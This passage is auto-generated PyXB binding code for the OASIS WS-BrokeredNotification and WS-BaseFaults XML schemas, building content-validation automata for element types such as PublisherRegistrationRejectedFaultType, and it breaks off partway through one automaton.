CTD_ANON_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Topic'), pyxb.bundles.wssplat.wsnt.TopicExpressionType, scope=CTD_ANON_, location=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 50, 3)))
CTD_ANON_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Demand'), pyxb.binding.datatypes.boolean, scope=CTD_ANON_, location=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 52, 3)))
CTD_ANON_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'CreationTime'), pyxb.binding.datatypes.dateTime, scope=CTD_ANON_, location=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 54, 3)))
def _BuildAutomaton_ ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_
del _BuildAutomaton_
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 79, 18))
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 81, 18))
counters.add(cc_1)
cc_2 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 85, 18))
counters.add(cc_2)
states = []
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON_._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'PublisherReference')), pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 79, 18))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON_._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Topic')), pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 81, 18))
st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = set()
symbol = pyxb.binding.content.ElementUse(CTD_ANON_._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Demand')), pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 83, 18))
st_2 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_2, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'CreationTime')), pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 85, 18))
st_3 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_3)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, False) ]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_1, False) ]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_3, [
]))
st_2._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_2, True) ]))
st_3._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
CTD_ANON_._Automaton = _BuildAutomaton_()
CTD_ANON_2._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'PublisherReference'), pyxb.bundles.wssplat.wsa.EndpointReferenceType, scope=CTD_ANON_2, location=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 95, 18)))
CTD_ANON_2._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Topic'), pyxb.bundles.wssplat.wsnt.TopicExpressionType, scope=CTD_ANON_2, location=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 98, 18)))
CTD_ANON_2._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Demand'), pyxb.binding.datatypes.boolean, scope=CTD_ANON_2, location=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 101, 18), unicode_default='false'))
CTD_ANON_2._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'InitialTerminationTime'), pyxb.binding.datatypes.dateTime, scope=CTD_ANON_2, location=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 104, 18)))
def _BuildAutomaton_2 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_2
del _BuildAutomaton_2
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 95, 18))
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 98, 18))
counters.add(cc_1)
cc_2 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 101, 18))
counters.add(cc_2)
cc_3 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 104, 18))
counters.add(cc_3)
cc_4 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 107, 18))
counters.add(cc_4)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_2._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'PublisherReference')), pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 95, 18))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_2._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Topic')), pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 98, 18))
st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_2, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_2._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Demand')), pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 101, 18))
st_2 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_3, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_2._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'InitialTerminationTime')), pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 104, 18))
st_3 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_3)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_4, False))
symbol = pyxb.binding.content.WildcardUse(pyxb.binding.content.Wildcard(process_contents=pyxb.binding.content.Wildcard.PC_lax, namespace_constraint=(pyxb.binding.content.Wildcard.NC_not, 'http://docs.oasis-open.org/wsn/br-2')), pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 107, 18))
st_4 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_4)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, False) ]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_1, False) ]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_2, True) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_2, False) ]))
st_2._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_3, True) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_3, False) ]))
st_3._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_4, True) ]))
st_4._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
CTD_ANON_2._Automaton = _BuildAutomaton_2()
CTD_ANON_3._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'PublisherRegistrationReference'), pyxb.bundles.wssplat.wsa.EndpointReferenceType, scope=CTD_ANON_3, location=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 116, 18)))
CTD_ANON_3._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'ConsumerReference'), pyxb.bundles.wssplat.wsa.EndpointReferenceType, scope=CTD_ANON_3, location=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 119, 5)))
def _BuildAutomaton_3 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_3
del _BuildAutomaton_3
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 119, 5))
counters.add(cc_0)
states = []
final_update = set()
symbol = pyxb.binding.content.ElementUse(CTD_ANON_3._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'PublisherRegistrationReference')), pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 116, 18))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_3._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'ConsumerReference')), pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 119, 5))
st_1 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
transitions = []
transitions.append(fac.Transition(st_1, [
]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, True) ]))
st_1._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
CTD_ANON_3._Automaton = _BuildAutomaton_3()
def _BuildAutomaton_4 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_4
del _BuildAutomaton_4
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_bf.xsd', 46, 6))
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_bf.xsd', 50, 6))
counters.add(cc_1)
cc_2 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_bf.xsd', 52, 6))
counters.add(cc_2)
cc_3 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_bf.xsd', 64, 6))
counters.add(cc_3)
cc_4 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_bf.xsd', 74, 6))
counters.add(cc_4)
states = []
final_update = None
symbol = pyxb.binding.content.WildcardUse(pyxb.binding.content.Wildcard(process_contents=pyxb.binding.content.Wildcard.PC_lax, namespace_constraint=(pyxb.binding.content.Wildcard.NC_not, 'http://docs.oasis-open.org/wsrf/bf-2')), pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_bf.xsd', 46, 6))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
symbol = pyxb.binding.content.ElementUse(PublisherRegistrationRejectedFaultType._UseForTag(pyxb.namespace.ExpandedName(_Namespace_wsrf_bf, 'Timestamp')), pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_bf.xsd', 48, 6))
st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.ElementUse(PublisherRegistrationRejectedFaultType._UseForTag(pyxb.namespace.ExpandedName(_Namespace_wsrf_bf, 'Originator')), pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_bf.xsd', 50, 6))
st_2 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_2, False))
symbol = pyxb.binding.content.ElementUse(PublisherRegistrationRejectedFaultType._UseForTag(pyxb.namespace.ExpandedName(_Namespace_wsrf_bf, 'ErrorCode')), pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_bf.xsd', 52, 6))
st_3 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_3)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_3, False))
symbol = pyxb.binding.content.ElementUse(PublisherRegistrationRejectedFaultType._UseForTag(pyxb.namespace.ExpandedName(_Namespace_wsrf_bf, 'Description')), pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_bf.xsd', 64, 6))
st_4 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_4)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_4, False))
symbol = pyxb.binding.content.ElementUse(PublisherRegistrationRejectedFaultType._UseForTag(pyxb.namespace.ExpandedName(_Namespace_wsrf_bf, 'FaultCause')), pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_bf.xsd', 74, 6))
st_5 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_5)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, False) ]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
]))
transitions.append(fac.Transition(st_3, [
]))
transitions.append(fac.Transition(st_4, [
]))
transitions.append(fac.Transition(st_5, [
]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_1, False) ]))
st_2._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_2, True) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_2, False) ]))
st_3._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_3, True) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_3, False) ]))
st_4._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_4, True) ]))
st_5._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
PublisherRegistrationRejectedFaultType._Automaton = _BuildAutomaton_4()
def _BuildAutomaton_5 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_5
del _BuildAutomaton_5
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_bf.xsd', 46, 6))
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_bf.xsd', 50, 6))
counters.add(cc_1)
cc_2 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_bf.xsd', 52, 6))
counters.add(cc_2)
cc_3 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_bf.xsd', 64, 6))
counters.add(cc_3)
cc_4 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_bf.xsd', 74, 6))
counters.add(cc_4)
states = []
final_update = None
symbol = pyxb.binding.content.WildcardUse(pyxb.binding.content.Wildcard(process_contents=pyxb.binding.content.Wildcard.PC_lax, namespace_constraint=(pyxb.binding.content.Wildcard.NC_not, 'http://docs.oasis-open.org/wsrf/bf-2')), pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_bf.xsd', 46, 6))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
symbol = pyxb.binding.content.ElementUse(PublisherRegistrationFailedFaultType._UseForTag(pyxb.namespace.ExpandedName(_Namespace_wsrf_bf, 'Timestamp')), pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_bf.xsd', 48, 6))
st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.ElementUse(PublisherRegistrationFailedFaultType._UseForTag(pyxb.namespace.ExpandedName(_Namespace_wsrf_bf, 'Originator')), pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_bf.xsd', 50, 6))
st_2 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_2, False))
symbol = pyxb.binding.content.ElementUse(PublisherRegistrationFailedFaultType._UseForTag(pyxb.namespace.ExpandedName(_Namespace_wsrf_bf, 'ErrorCode')), pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_bf.xsd', 52, 6))
st_3 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_3)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_3, False))
symbol = pyxb.binding.content.ElementUse(PublisherRegistrationFailedFaultType._UseForTag(pyxb.namespace.ExpandedName(_Namespace_wsrf_bf, 'Description')), pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_bf.xsd', 64, 6))
st_4 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_4)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_4, False))
symbol = pyxb.binding.content.ElementUse(PublisherRegistrationFailedFaultType._UseForTag(pyxb.namespace.ExpandedName(_Namespace_wsrf_bf, 'FaultCause')), pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_bf.xsd', 74, 6))
st_5 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_5)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, False) ]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
]))
transitions.append(fac.Transition(st_3, [
]))
transitions.append(fac.Transition(st_4, [
]))
transitions.append(fac.Transition(st_5, [
]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_1, False) ]))
st_2._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_2, True) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_2, False) ]))
st_3._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_3, True) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_3, False) ]))
st_4._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_4, True) ]))
st_5._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
PublisherRegistrationFailedFaultType._Automaton = _BuildAutomaton_5()
def _BuildAutomaton_6 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_6
del _BuildAutomaton_6
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 148, 8))
counters.add(cc_0)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.WildcardUse(pyxb.binding.content.Wildcard(process_contents=pyxb.binding.content.Wildcard.PC_lax, namespace_constraint=(pyxb.binding.content.Wildcard.NC_not, 'http://docs.oasis-open.org/wsn/br-2')), pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 148, 8))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
CTD_ANON_4._Automaton = _BuildAutomaton_6()
def _BuildAutomaton_7 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_7
del _BuildAutomaton_7
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 158, 8))
counters.add(cc_0)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.WildcardUse(pyxb.binding.content.Wildcard(process_contents=pyxb.binding.content.Wildcard.PC_lax, namespace_constraint=(pyxb.binding.content.Wildcard.NC_not, 'http://docs.oasis-open.org/wsn/br-2')), pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 158, 8))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
CTD_ANON_5._Automaton = _BuildAutomaton_7()
def _BuildAutomaton_8 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_8
del _BuildAutomaton_8
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_bf.xsd', 46, 6))
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_bf.xsd', 50, 6))
counters.add(cc_1)
cc_2 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_bf.xsd', 52, 6))
counters.add(cc_2)
cc_3 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_bf.xsd', 64, 6))
counters.add(cc_3)
cc_4 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_bf.xsd', 74, 6))
counters.add(cc_4)
states = []
final_update = None
symbol = pyxb.binding.content.WildcardUse(pyxb.binding.content.Wildcard(process_contents=pyxb.binding.content.Wildcard.PC_lax, namespace_constraint=(pyxb.binding.content.Wildcard.NC_not, 'http://docs.oasis-open.org/wsrf/bf-2')), pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_bf.xsd', 46, 6))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
symbol = pyxb.binding.content.ElementUse(ResourceNotDestroyedFaultType._UseForTag(pyxb.namespace.ExpandedName(_Namespace_wsrf_bf, 'Timestamp')), pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_bf.xsd', 48, 6))
